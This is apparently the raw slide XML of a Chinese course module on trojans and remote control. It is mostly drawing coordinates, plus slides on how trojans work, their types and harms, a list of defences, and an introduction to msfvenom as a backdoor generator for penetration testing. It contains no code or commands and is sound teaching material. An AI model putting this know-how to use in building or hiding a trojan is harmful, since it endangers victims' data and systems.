                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718773" y="123068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678049" y="143510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="638179" y="165366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="599195" y="188603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="561129" y="213188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524014" y="239089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487884" y="266273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452771" y="294707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418706" y="324359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385724" y="355194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353856" y="387181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323136" y="420287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293596" y="454479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265269" y="489724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238187" y="525989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212383" y="563242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187890" y="601450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164740" y="640580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142967" y="680598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122602" y="721473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103678" y="763172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86229" y="805661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70287" y="848908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55883" y="892880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43052" y="937545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31826" y="982869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22238" y="1028819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14319" y="1075364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8103" y="1122469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3623" y="1170103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="906" y="1218489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1266825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="911" y="1315416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3623" y="1363546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8103" y="1411180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14319" y="1458285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20637" y="1495422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537225" y="1495422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="525739" y="1455015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="515722" y="1409344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508457" y="1362696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="504033" y="1315160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502539" y="1266825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="504033" y="1218489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508457" y="1170953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="515722" y="1124305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="525739" y="1078634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="538418" y="1034032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553671" y="990586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="571408" y="948387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="591541" y="907524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613981" y="868087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="638639" y="830164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665425" y="793847"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="694250" y="759224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="725027" y="726384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="757665" y="695418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="792075" y="666414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="828169" y="639463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="865858" y="614653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="905052" y="592075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="945663" y="571818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="987601" y="553972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1030778" y="538625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075104" y="525868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1120491" y="515790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1166850" y="508481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1214091" y="504029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1262126" y="502526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1352550" y="502526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1352550" y="3300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310532" y="914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1262126" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1352550" h="1495425">
                <a:moveTo>
                  <a:pt x="1352550" y="502526"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1262126" y="502526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310146" y="504029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1352550" y="508026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1352550" y="502526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1142047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11915775" y="49339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1582400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174432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Freeform 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142047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1915775" y="51816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Freeform 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400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1174432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AutoShape 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142047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Freeform 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="54197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9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="9794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="20413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="33400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="46315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="56896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17466" y="64047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28575" y="66675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683" y="64047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="56896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="46315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="33400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="20413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="9794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683" y="262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11582400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1174432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AutoShape 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142047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1915775" y="56673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AutoShape 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400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AutoShape 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1174432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AutoShape 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142047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Freeform 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="5876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1582400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174432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AutoShape 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142047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Freeform 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="61150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1582400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174432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AutoShape 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142047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Freeform 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="63627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582400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74432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AutoShape 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142047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11915775" y="66103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AutoShape 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400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AutoShape 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1174432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11325225" y="1866900"/>
            <a:ext cx="866775" cy="1733550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="866775" h="1733550">
                <a:moveTo>
                  <a:pt x="866775" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="819221" y="1282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="772337" y="5086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="726190" y="11345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680844" y="19993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="636367" y="30965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="592823" y="44192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550281" y="59611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508804" y="77154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="468461" y="96756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429316" y="118349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391436" y="141869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354887" y="167249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319736" y="194423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286047" y="223325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253888" y="253888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223325" y="286047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194423" y="319736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167249" y="354887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141869" y="391436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118349" y="429316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96756" y="468461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77154" y="508804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59611" y="550281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44192" y="592823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30965" y="636367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19993" y="680844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11345" y="726190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5086" y="772337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="819221"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="866775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="914328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5086" y="961212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11345" y="1007359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19993" y="1052705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30965" y="1097182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44192" y="1140726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59611" y="1183268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77154" y="1224745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96756" y="1265088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118349" y="1304233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141869" y="1342113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167249" y="1378662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194423" y="1413813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223325" y="1447502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253888" y="1479661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286047" y="1510224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319736" y="1539126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354887" y="1566300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391436" y="1591680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429316" y="1615200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="468461" y="1636793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508804" y="1656395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550281" y="1673938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="592823" y="1689357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="636367" y="1702584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680844" y="1713556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="726190" y="1722204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="772337" y="1728463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="819221" y="1732267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866775" y="1733550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86677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Freeform 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11015726" y="471927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0" y="1194947"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="949" y="1146873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3772" y="1099280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435" y="1052205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14900" y="1005683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23133" y="959750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33098" y="914442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44758" y="869794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58079" y="825841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73024" y="782621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89558" y="740168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107645" y="698518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127250" y="657707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148336" y="617771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170868" y="578745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194811" y="540665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220128" y="503567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246784" y="467486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274743" y="432458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303969" y="398519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334427" y="365705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366081" y="334051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398895" y="303593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432834" y="274366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467862" y="246408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503943" y="219752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541041" y="194435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579121" y="170492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618147" y="147960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658083" y="126874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698894" y="107269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740544" y="89182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="782997" y="72648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="826218" y="57703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="870170" y="44382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914818" y="32722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="960126" y="22757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1006059" y="14524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1052581" y="8059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1099656" y="3396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1147249" y="573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1176274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Freeform 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11015726" y="1666875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1176274" y="1195074"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1099656" y="1191677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1052581" y="1187013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1006059" y="1180546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="960126" y="1172312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914818" y="1162345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="870170" y="1150682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="826218" y="1137358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="782997" y="1122410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740544" y="1105873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698894" y="1087782"/>
                </a:ln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Freeform 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11063605" y="728980"/>
            <a:ext cx="389255" cy="439420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="389254" h="439419">
                <a:moveTo>
                  <a:pt x="388747" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="204470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="373252" y="438912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38874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5662676" y="1976501"/>
            <a:ext cx="883919" cy="19050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="883919" h="19050">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="883920" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="3C7CB3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7591425" y="257175"/>
            <a:ext cx="3686175" cy="54292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TextBox 87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="2514600"/>
            <a:ext cx="8526145" cy="19018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3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项目八</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="43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sz="43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木马及远程控制技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="43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知识储备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PART04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1395" y="1770380"/>
            <a:ext cx="600900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程序与其他病毒程序一样都需要在运行时隐藏自己的行踪。但与传统的文件型病毒寄生于正常可执行程序体内，通过寄主程序的执行而被执行的方式不同，大多数木马程序都有一个独立的可执行文件。木马通常不容易被发现，因为它一般是以正常应用的身份在系统中运行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程序采用客户端/服务器(C/S)架构，其中客户端是控制者的操作界面，服务器端潜行于目标计算机中。客户端置于控制者电脑，而服务器端则植入被入侵机。一旦服务器端激活，控制者即可通过客户端远程操控目标机器，进行文件传输和修改。其工作原理如图8-1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图片 18" descr="1526ac81-b392-4489-998a-b6fe31a037fc"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010400" y="1828800"/>
            <a:ext cx="4826635" cy="289433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文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8305800" y="4724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图8-1 木马工作原理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什么是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6800" y="17526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攻击者常利用绑定工具将服务器端与合法软件结合，诱使受害者运行，悄无声息地完成木马安装。木马的定制化程度高，可调整运行端口、启动时机、隐身方式、加密通信等。攻击者还能设定登录密码，选择通知方式，如邮件或通过隐蔽网络通道广播受侵IP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服务器端启动后，可直接攻击计算机上运行的客户端程序，通过预设端口通信。无论联系方式如何变化，攻击者总是通过客户端向服务器发送指令，实现对用户计算机的操控。这种隐蔽而灵活的特性，使得木马成为信息安全的一大威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什么是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6800" y="17526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木马（Trojan Horse）是一种恶意软件，通过伪装成正常、合法的程序或文件来欺骗用户，实际上在背后执行恶意活动。木马常被用于窃取敏感信息、损坏系统功能、远程控制受感染的计算机等恶意目的。以下是木马的一些常见分类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（1）远程访问木马：允许攻击者在远程位置控制受感染系统。可以用于窃取敏感信息、监视用户活动、执行远程命令等。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（2）下载器木马：用于下载其他恶意软件或文件到受感染系统。攻击者可以灵活地更新和部署新的恶意代码。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（3）密码窃取木马：专注于窃取用户的账户信息、密码和其他敏感数据。可以通过键盘记录、网络嗅探等方式进行信息收集。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（4）后门木马：开辟后门，使攻击者可以在系统上保持持久访问。通常用于未来的攻击、数据窃取或其他恶意活动。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2.木马的分类</a:t>
            </a:r>
            <a:endParaRPr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6800" y="17526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（5）银行木马：针对在线银行和支付系统的木马，用于窃取金融信息。可以通过篡改网页或截取交易信息来实现攻击目标。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（6）代理木马：将受感染系统转变为攻击者的代理，用于隐藏攻击者的真实身份。常用于进行匿名攻击或绕过安全防护。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（7）嵌入式木马：将木马嵌入合法的程序或文件中，使其看起来像正常的应用。通过社会工程学手段欺骗用户执行这些程序，从而感染系统。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（8）多层木马：使用多个木马组合在一起，形成多层的攻击。这样的木马通常更难检测和清除，因为它们具有更复杂的结构和功能。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在防范木马攻击方面，用户和组织需要保持警惕，定期更新防病毒软件，不轻信不明链接，使用强密码，并实施信息安全最佳实践以减少木马感染的风险。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2.木马的分类</a:t>
            </a:r>
            <a:endParaRPr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6800" y="17526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木马（TrojanHorse）的危害广泛而深刻，它们可以对个人用户、企业和整个网络生态系统造成严重影响。以下是木马可能带来的一些主要危害：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（1）信息窃取：木马可以用于窃取用户的敏感信息，如用户名、密码、信用卡信息等。攻击者可以利用这些信息进行身份盗窃、欺诈或其他恶意活动。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（2）远程控制：某些木马允许攻击者在远程位置控制受感染系统，执行各种恶意操作。远程控制功能使攻击者能够实时操纵受感染系统，可能导致数据丢失、系统崩溃或其他损害。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（3）数据破坏：木马可以被设计成破坏文件、系统设置或整个操作系统。攻击者可能通过删除、篡改或加密文件来造成数据丢失或不可用。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（4）恶意下载：下载器木马可以用于下载和安装其他恶意软件，扩大攻击面。这可能导致系统负荷增加、网络流量异常，同时引入新的安全威胁。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3.木马的危害</a:t>
            </a:r>
            <a:endParaRPr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6800" y="17526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木马（TrojanHorse）的危害广泛而深刻，它们可以对个人用户、企业和整个网络生态系统造成严重影响。以下是木马可能带来的一些主要危害：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（5）系统后门：后门木马在系统中留下后门，使攻击者能够在未来随时访问系统。这可能导致系统长期被攻击，而且这类攻击往往更难被察觉和清除。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（6）网络攻击：木马可以被用于发起网络攻击，如分布式拒绝服务攻击（DDoS）。多个受感染的系统协同工作，可能对目标系统或网络造成严重影响。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（7）金融损失：针对银行的木马可能导致金融信息泄露，进而导致用户或机构遭受经济损失。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（8）隐私侵犯：木马可能窥探用户的隐私，通过监视摄像头、麦克风等设备，侵犯个人生活和工作隐私。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（9）恶意传播：木马可以用于传播恶意软件，通过感染其他系统来扩散。这可能导致大规模的网络感染和传播，对整个信息安全构成威胁。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3.木马的危害</a:t>
            </a:r>
            <a:endParaRPr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6800" y="17526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为了减少木马的危害，用户和组织需要实施有效的安全措施，包括定期更新防病毒软件、使用强密码、谨慎处理陌生文件和链接，以及保持系统和应用程序的及时更新。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要有效防御木马，用户和组织可以采取一系列安全措施，包括以下几点：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（1）使用强密码：使用复杂、唯一的密码，包括字母、数字和特殊字符，以减少被破解的风险。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（2）定期更新操作系统和应用程序：及时应用操作系统和应用程序的安全补丁和更新，以修复已知漏洞，减少攻击者的入侵机会。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（3）安装和更新安全软件：使用可信赖的防病毒软件和防恶意软件工具，并定期更新其病毒定义文件以检测新的威胁。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（4）谨慎点击链接和附件：避免点击不明链接和来自未知发送者的附件，特别是在电子邮件、社交媒体和即时消息中。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（5）使用防火墙：启用系统和网络防火墙，以监控和控制网络流量，防止未经授权的访问。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（6）教育用户：提供安全意识培训，教育用户警惕社会工程学攻击，并使他们了解潜在的网络威胁。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3.木马的危害</a:t>
            </a:r>
            <a:endParaRPr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6002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（7）网络流量监测：使用网络流量监测工具，检测异常流量和行为，及时发现潜在的木马活动。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（8）定期备份数据：定期备份重要数据，并将备份存储在与网络隔离的安全位置，以防止数据丢失或被勒索软件攻击。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（9）限制用户权限：实施最小权限原则，确保用户仅拥有执行其工作所需的最低权限，以减少木马可能的影响范围。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（10）监控系统行为：使用行为分析工具来监控系统的正常行为，及时发现异常活动，并采取措施进行响应。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（11）加密敏感信息：对敏感数据进行加密，即使被窃取，攻击者也难以解密并使用。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（12）使用网络隔离：将关键系统和网络进行隔离，减少木马传播的可能性。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（13）多因素身份验证：启用多因素身份验证，增加用户身份验证的安全性。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通过综合使用上述安全措施，可以大大提高系统抵御木马攻击的能力。同时，持续的安全培训和定期的安全审查也是确保系统安全的关键因素。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276350" y="127635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3.木马的危害</a:t>
            </a:r>
            <a:endParaRPr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6002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，这个名字来源于其功能——它像毒液一样，能够渗透并控制目标系统。它不仅仅是一个简单的工具，而是msfpayload（攻击载荷生成器）和msfencode（编码器，用于加密有效载荷）的完美结合。Msfvenom提供了一个统一的界面，让使用者能够轻松地创建各种类型的后门程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的主要功能是生成后门软件，这些软件能够在目标机器上执行，从而允许攻击者在本地监听并控制远程主机。它本质上是一种远程控制木马，可以用于合法的渗透测试和安全评估，以帮助组织发现并修复潜在的安全漏洞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AutoShape 55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0" y="0"/>
            <a:ext cx="2000250" cy="2105025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2000250" h="2105025">
                <a:moveTo>
                  <a:pt x="1922457" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2057171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60397" y="2071140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106298" y="2080010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152651" y="2087570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199439" y="2093801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246640" y="2098681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294234" y="2102192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342202" y="2104313"/>
                </a:lnTo>
